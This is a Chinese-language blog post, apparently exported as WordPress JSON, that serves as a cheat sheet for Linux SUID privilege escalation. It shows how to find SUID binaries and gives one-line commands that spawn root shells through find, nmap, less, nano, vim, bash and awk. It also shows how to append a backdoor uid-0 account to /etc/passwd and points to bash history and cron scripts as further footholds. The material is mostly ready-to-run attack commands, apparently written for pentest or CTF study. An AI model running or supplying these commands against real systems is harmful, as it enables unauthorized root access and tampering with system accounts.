{"id":331,"date":"2026-05-12T21:10:16","date_gmt":"2026-05-12T13:10:16","guid":{"rendered":"https:\/\/arknight.wiki\/?p=331"},"modified":"2026-05-12T21:10:16","modified_gmt":"2026-05-12T13:10:16","slug":"suid%e6%8f%90%e6%9d%83","status":"publish","type":"post","link":"https:\/\/arknight.wiki\/index.php\/2026\/05\/12\/suid%e6%8f%90%e6%9d%83\/","title":{"rendered":"suid\u63d0\u6743"},"content":{"rendered":"<h1>suid\u63d0\u6743\uff1a<\/h1>\n<p>\u539f\u7406\uff1a\u6709suid\u6743\u9650\u7684\u53ef\u6267\u884c\u6587\u4ef6\u5728\u6267\u884c\u8fdb\u7a0b\u65f6\u4f1a\u4ee5\u6587\u4ef6\u6240\u6709\u8005\u6743\u9650\u8fd0\u884c\uff0c\u5982\u679c\u6240\u6709\u8005\u662froot\uff0c\u5c31\u53ef\u4ee5\u5229\u7528suid\u6587\u4ef6\u8fdb\u884c\u63d0\u6743<\/p>\n<p>\u8bbe\u7f6e\uff0c\u79fb\u9664suid\u6743\u9650\uff1a<\/p>\n<pre><code>chmod u+s filename #\u8bbe\u7f6esuid\nchmod u-s filename #\u53bb\u9664suid<\/code><\/pre>\n<h2>\u67e5\u627esuid\u6587\u4ef6\uff1a<\/h2>\n<pre><code>find \/ -user root -perm -4000 -print 2&gt;\/dev\/null\nfind \/ -perm -u=s -type f 2&gt;\/dev\/null\nfind \/ -user root -perm -4000 -exec ls -ldb {} ;<\/code><\/pre>\n<h2>\u5229\u7528\uff1a<\/h2>\n<h3>find\uff1a<\/h3>\n<pre><code> find \u5177\u6709suid\u6743\u9650\u7684filename -exec whoami ; -quit\n#root\nfind \u5177\u6709suid\u6743\u9650\u7684filename -exec \/bin\/sh -p ; -quit\n#whoami\n#root\u00a0 \n\n #\u5148\u524d\u5229\u7528\u4ee5\u4e0a\u67e5\u627esuid\u6587\u4ef6\u67e5\u8be2\u5230\u4e86\/usr\/bin\/find \u6709suid\u6743\u9650\ntouch 1.txt #\u521b\u5efa1.txt\n\/usr\/bin\/find 1.txt -exec whoami ; \n#\u81f3\u5c11\u8981\u6709\u4e00\u4e2a\u6587\u4ef6\u8def\u5f84\u7ed9find<\/code><\/pre>\n<h3>nmap\uff1a<\/h3>\n<p>nmap\u53ef\u4ee5\u542f\u52a8\u4ea4\u4e92\u5f0fshell\uff0c\u5982\u679c\u6709suid\u5c31\u4f1a\u4ee5root\u6743\u9650\u5f00\u542f\u4e00\u4e2ashell<\/p>\n<pre><code>nmap --interactive \nnmap&gt; !sh\n\nsh-3.2# whoami\nroot<\/code><\/pre>\n<p>\u4e5f\u53ef\u4ee5\u8dd1\u811a\u672c<\/p>\n<pre><code>#\u811a\u672c\uff0c\u547d\u540d\u4e3a1.nse\uff1a\nos.execute('\/bin\/sh') \n\n#nmap\u6267\u884c\u547d\u4ee4\nnmap --script=1.nse<\/code><\/pre>\n<h3>less\/more\uff1a<\/h3>\n<p>\u8fd9\u4e24\u4e2a\u5dee\u4e0d\u591a\uff0c\u53ef\u4ee5\u5f00\u4ea4\u4e92\u5f0fshell\uff0c\u4e0d\u8fc7\u8981\u6ce8\u610f\u5fc5\u987b\u67e5\u770b\u5927\u6587\u4ef6\uff0c\u4e0d\u7136\u8fdb\u5165\u4e0d\u4e86\u7ffb\u9875\uff0c\u8fd9\u6837\u65e0\u6cd5\u7528<code>!<\/code>\u547d\u4ee4\u8fdb\u5165shell\u3002<\/p>\n<pre><code>less \/etc\/passwd \n!\/bin\/sh \n\nVISUAL=\"\/bin\/sh -c '\/bin\/sh'\" less \/etc\/profile\nv \n#less \u5728\u67e5\u770b\u6587\u4ef6\u65f6\uff0c\u5982\u679c\u4f60\u6309\u4e0b v \u952e\uff08\u4ee3\u8868 \u201cvisual edit\u201d\uff09\uff0c\u5b83\u4f1a\u5c1d\u8bd5\u8c03\u7528\u5916\u90e8\u7f16\u8f91\u5668\u3002less \u4f18\u5148\u4f7f\u7528 $VISUAL \u73af\u5883\u53d8\u91cf\u6307\u5b9a\u7684\u7f16\u8f91\u5668\uff1b\u5982\u679c\u672a\u8bbe\u7f6e\uff0c\u5219\u56de\u9000\u5230 $EDITOR\u3002\u8fd9\u91cc\u6211\u4eec\u8bbe\u7f6e\u4e3ashell\u3002\n<\/code><\/pre>\n<h3>nano\uff1a<\/h3>\n<pre><code>nano\nctrl + R\nctrl + X\n#shell<\/code><\/pre>\n<h3>cp\/mv\uff1a<\/h3>\n<p>\u7528root\u6743\u9650\u6539etc\/passwd\uff0c\u5199\u5165\u4e00\u4e2a\u65b0\u7684root\u6743\u9650\u8d26\u6237<\/p>\n<pre><code>cat \/etc\/passwd \n#\u770b\u683c\u5f0f\nopenssl passwd -1 -salt test testaaa\n#\u5f97\u5230md5\u52a0\u5bc6\u7684\u5bc6\u7801\u54c8\u5e0c\uff1a$1$test$giCVmzusADSPMon2mwEWo1 \necho 'test:$1$test$giCVmzusADSPMon2mwEWo1:0:0::\/root\/:\/bin\/sh' &gt;&gt; passwd \ncp passwd \/etc\/passwd \nsu - test <\/code><\/pre>\n<h3>vi\/vim\uff1a<\/h3>\n<pre><code>vim.tiny \/etc\/passwd \n:!\/bin\/sh<\/code><\/pre>\n<h3>bash\uff1a<\/h3>\n<pre><code>bash -p\n#\u751f\u6210\u4e00\u4e2a  bash-3.2# \nbash-3.2# id\n#uid=1024(qsdz) gid=999(qsdz) euid=0(root) groups=999(qsdz)<\/code><\/pre>\n<h3>awk\uff1a<\/h3>\n<p>AWK \u7684\u4e3b\u8981\u5de5\u4f5c\u662f<strong>\u9010\u884c\u8bfb\u53d6\u6587\u4ef6<\/strong>\uff0c\u6839\u636e\u6307\u5b9a\u7684\u89c4\u5219\u5bf9\u6bcf\u4e00\u884c\u8fdb\u884c\u5339\u914d\u548c\u5904\u7406\u3002<\/p>\n<p>\u8bed\u6cd5\uff1a<code>awk '\u6761\u4ef6 { \u52a8\u4f5c }' \u6587\u4ef6\u540d<\/code><\/p>\n<pre><code>awk 'BEGIN {system(\"\/bin\/bash\")}'<\/code><\/pre>\n<h3>\u4e00\u4e9b\u6bd4\u8f83\u795e\u79d8\u7684\uff1a<\/h3>\n<pre><code>cat ~\/.bash_history \n#\u8fd9\u4e2a\u547d\u4ee4\u53ef\u4ee5\u67e5\u770b\u5f53\u524d\u7528\u6237\u4f7f\u7528\u8fc7\u7684\u5386\u53f2\u547d\u4ee4\n#\u6709\u53ef\u80fd\u4f1a\u5f97\u5230root\u767b\u5f55\u7684\u5bc6\u7801 \n\nls -l \/etc\/cron*\n#\u67e5\u770b\u5b9a\u671f\u6267\u884c\u7684\u8ba1\u5212\u4efb\u52a1\uff0c\u5982\u679c\u6709\u7528\u6237\u5199\u7684\u811a\u672c\uff0c\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5\u8fdb\u884c\u811a\u672c\u7684\u4fee\u6539\u7136\u540e\u56de\u8fderootshell\uff0c\u4ece\u800c\u63d0\u6743 \n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>suid\u63d0\u6743\uff1a \u539f\u7406\uff1a\u6709suid\u6743\u9650\u7684\u53ef\u6267\u884c\u6587\u4ef6\u5728\u6267\u884c\u8fdb\u7a0b\u65f6\u4f1a\u4ee5\u6587\u4ef6\u6240\u6709\u8005\u6743\u9650\u8fd0\u884c\uff0c\u5982\u679c\u6240\u6709\u8005\u662froot\uff0c\u5c31\u53ef [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-331","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/331","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/comments?post=331"}],"version-history":[{"count":1,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/331\/revisions"}],"predecessor-version":[{"id":332,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/331\/revisions\/332"}],"wp:attachment":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/media?parent=331"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/categories?post=331"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/tags?post=331"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}